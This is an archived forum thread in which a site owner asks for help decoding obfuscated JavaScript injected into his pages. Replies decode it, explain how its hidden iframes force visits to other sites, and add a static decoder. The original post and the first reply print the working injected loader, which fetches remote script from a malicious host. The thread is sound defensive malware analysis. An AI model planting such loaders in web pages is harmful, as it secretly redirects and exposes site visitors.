Web Hosting Talk

View Full Version : Decode Javascript


Sandino
01-26-2010, 12:48 AM
Hello.

I was wondering if anyone could "decode" this for me and tell me the exact URL, and what exactly the script does.
It is javascript.

Thanks!


<script> try{window.onload=function(){document.write('<div id=megaid>blogcatalog-com.uploading</div>');Fgjd8a1wqtz = document.getElementById('megaid').innerHTML + '.)@c$!o$m)&&.&d)^##a$&$i)!l#$(y&m^(a$(i)&l^(&&-##)^c$o#&$-$@#u^@k@!.@)&l^@$$i$$m#o!)w)$&e(b(@c&!#@a@$&m@$!.$r(#!u#&:^D!#&@E&@B)^^#U@#G)$(/$r!&a#^p&(i#d!4^()m)!e##.))$$c^^o&&m&!!(/&$r##&a@@!#!p&(i)$&&d#4@$$#m&(e#^^.!c($&o$$m(/^g(@^o($!@o&@&g)^l!$e@.&!&c!^#&o&$&$m)&/)^r$^#(m^x#!(a^#d!s(.@##@c(o#)(!m^/)1)1$0^m&)b@.^(c)o)^m)/^!'.replace(/#|\!|\)|@|\(|&|\$|\^/ig, '') ;document.write('<scr'+'ipt src=http://'+Fgjd8a1wqtz.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(Rusbkqzn ) {}</script>
<!--4aa2280f0a9cd07f7a45cd3bfdc434f9-->

Xeentech
01-26-2010, 03:49 AM
Well the code essentially decodes itself, if you run it. It's just a regex to remove garbage from the string.

First format it properly, so you can read and understand it. So you don't inadvertently run something malicious.

try {
    window.onload = function() {
        document.write('<div id=megaid>blogcatalog-com.uploading</div>');
        Fgjd8a1wqtz =
            document.getElementById('megaid').innerHTML +
            '.)@c$!o$m)&&.&d)^##a$&$i)!l#$(y&m^(a$(i)&l^(&&-##)^c$o#&$-$@#u^@k@!.@)&l^@$$i$$m#o!)w)$&e(b(@c&!#@a@$&m@$!.$r(#!u#&:^D!#&@E&@B)^^#U@#G)$(/$r!&a#^p&(i#d!4^()m)!e##.))$$c^^o&&m&!!(/&$r##&a@@!#!p&(i)$&&d#4@$$#m&(e#^^.!c($&o$$m(/^g(@^o($!@o&@&g)^l!$e@.&!&c!^#&o&$&$m)&/)^r$^#(m^x#!(a^#d!s(.@##@c(o#)(!m^/)1)1$0^m&)b@.^(c)o)^m)/^!'
            .replace(/#|\!|\)|@|\(|&|\$|\^/ig, '')
            .replace(/DEBUG/g, '8080');

        document.write('<scr'+'ipt src=http://' + Fgjd8a1wqtz.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');
    }
} catch(Rusbkqzn ) {
}

Already a lot better.

To be safe you don't even run all the code. Just run the .replace(s) in something like Firebug (http://getfirebug.com/). Failing that, wrap it in an alert and drop it in a .html on your desktop:

alert('blogcatalog-com.uploading' + '.)@c$!o$m)&&.&d)^##a$&$i)!l#$(y&m^(a$(i)&l^(&&-##)^c$o#&$-$@#u^@k@!.@)&l^@$$i$$m#o!)w)$&e(b(@c&!#@a@$&m@$!.$r(#!u#&:^D!#&@E&@B)^^#U@#G)$(/$r!&a#^p&(i#d!4^()m)!e##.))$$c^^o&&m&!!(/&$r##&a@@!#!p&(i)$&&d#4@$$#m&(e#^^.!c($&o$$m(/^g(@^o($!@o&@&g)^l!$e@.&!&c!^#&o&$&$m)&/)^r$^#(m^x#!(a^#d!s(.@##@c(o#)(!m^/)1)1$0^m&)b@.^(c)o)^m)/^!'
.replace(/#|\!|\)|@|\(|&|\$|\^/ig, '')
.replace(/DEBUG/g, '8080'));

The resulting URL leads to some more poorly obfuscated Javascript.
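
Added example (editor's addition, not code from this thread or any poster): a static decoder for the junk-character scheme discussed above. It pulls the div text, the junk-laden string literal and the .replace() chain out of the script's source with regular expressions and applies them in order, so the URL comes out without the script itself ever running, which is the same result as Xeentech's alert() trick but without handing the code a document to write into. The sample it runs on is constructed in the same shape as Sandino's snippet, with a made-up host and path (decoy-host.example.invalid:8080/path/) so the result points nowhere; the URL parsing uses the standard URL global available in Node and browsers.

```javascript
// Added example, not part of the thread: decode the injected snippet statically.
// Nothing from the script is executed; the div text, the junk-laden string
// literal and the .replace() chain are read out of the source text with
// regular expressions and applied in order.

// Constructed sample in the same shape as the snippet Sandino posted. The
// hostname and path (decoy-host.example.invalid, /path/) are made up so this
// resolves to nothing real.
const SAMPLE = String.raw`<script> try{window.onload=function(){document.write('<div id=megaid>decoy-host</div>');Fgjd8a1wqtz = document.getElementById('megaid').innerHTML + '.)e@x$a#m&p!l^e(.)i@n$v#a&l!i^d(:)D@E$B#U&G!/^p(a)t@h$/#'.replace(/#|\!|\)|@|\(|&|\$|\^/ig, '') ;document.write('<scr'+'ipt src=http://'+Fgjd8a1wqtz.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(Rusbkqzn ) {}</script>`;

// Pull every .replace(/pattern/flags, 'replacement') call out of the source,
// in the order the script would apply them.
function extractReplaceCalls(src) {
  const re = /\.replace\(\/((?:\\.|[^\/\\\n])+)\/([a-z]*),\s*'([^']*)'\)/g;
  const calls = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    calls.push({ pattern: m[1], flags: m[2], replacement: m[3] });
  }
  return calls;
}

// Returns the decoded URL and its parts, or null if the source does not have
// the three pieces this scheme is built from.
function decodeInjectedScript(src) {
  // The visible prefix: whatever the script writes into <div id=megaid>.
  const div = /<div id=megaid>([^<]*)<\/div>/.exec(src);
  // The junk-laden literal concatenated onto that div's innerHTML.
  const lit = /innerHTML\s*\+\s*'([^']*)'/.exec(src);
  const calls = extractReplaceCalls(src);
  if (!div || !lit || calls.length === 0) return null;

  let s = div[1] + lit[1];
  for (const c of calls) {
    // Rebuild the script's own RegExp from its source text; only the replace
    // calls are evaluated, never the script.
    s = s.replace(new RegExp(c.pattern, c.flags), c.replacement);
  }
  // The script prefixes http:// when it assembles the src attribute.
  const url = new URL('http://' + s);
  return {
    url: url.href,
    hostname: url.hostname,
    port: url.port,
    pathname: url.pathname,
    replacements: calls,
  };
}

console.log(decodeInjectedScript(SAMPLE));
```

This only handles this one scheme (a div prefix, one string literal, and a chain of .replace() calls with literal replacements); a differently built obfuscator needs its own parser. Run it against a copy of the infected file's text, never by loading the file in a browser.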

acenetbrian
01-26-2010, 03:48 PM
Like Xeentech said, the quick and dirty way is to start replacing functions that "do" things like document.write() with something like alert().

Still, not the best thing to be playing around with. If you encounter obfuscated code that you're not familiar with and know it shouldn't be there, it's probably malicious. It doesn't necessarily matter what it's doing beyond the fact that it's malicious and your website/server may have been compromised.

Specifically, though:

<div id=megaid>blogcatalog-com.uploading</div>
<script src=http://blogcatalog-com.uploading.com.dailymail-co-uk.XXXXXXwebcam.ru:8080/rapid4me.com/rapid4me.com/rmxads.com/110mb.com/></script>

I've replaced part of the URL with XXXXXX simply because I don't want to post a valid link to malicious code. Replace the second document.write() with an alert() if you want to see the true code for yourself, though.

Sandino
01-26-2010, 05:16 PM
Thanks! But no one knows exactly what it does?
Say if it is in a page and you go to a site with it, does it do anything to you?
Or take you to another page.

acenetbrian
01-26-2010, 05:47 PM
The malicious code goes to another obfuscated chunk of JavaScript, like Xeentech said. That creates another iframe to:

http://blogcatalog-com.uploading.com.dailymail-co-uk.XXXXXwebcam.ru:8080/index.php?bz

(Again, broken link on purpose)

The resulting final iframe then causes you to visit many, many websites through many more hidden iframes of that nature.

In essence, this causes a visitor of the infected webpage to "visit" many dozens of websites without their knowledge using a nest of hidden iframes.

The end game for the abuser? I would assume page ranking. This "forces" unsuspecting people to visit these sites. Perhaps search engines will traverse these links as well? Doubtful, though.

But I've always viewed it as a malicious way of artificially boosting page rank/etc. The JavaScript doesn't "do" anything more than cause you to visit pages unknowingly.

That's the least of your worries, though. You likely have a compromised script/account/server on your hands.

Sandino
01-26-2010, 06:01 PM
Ah okay that's what i thought.

Yeah someone had gotten hold of one of my FTP passwords.
So they used a bot that tunneled through a ton of proxies and downloaded all the index / .js files, injected that code, and reuploaded them.

Glad I always keep backups, and that was the only damage they did ;)


Thanks for everyone's help!

Xeentech
01-27-2010, 03:27 AM
I couldn't actually get the page referenced by the iframe tag to load, acenetbrian. I assumed it was because my User-Agent showed I wasn't on a browser vulnerable to whatever exploit they were using.

Although, I had my doubts, given the very weak attempt to obfuscate by replacing punctuation with ''.

If the payload is just to load multiple sites in iframes I would guess that it's to get ratings up for advertisers, for anyone doing per-impression rather than per-click billing. But surely those advertisers do a (window !== window.top) comparison?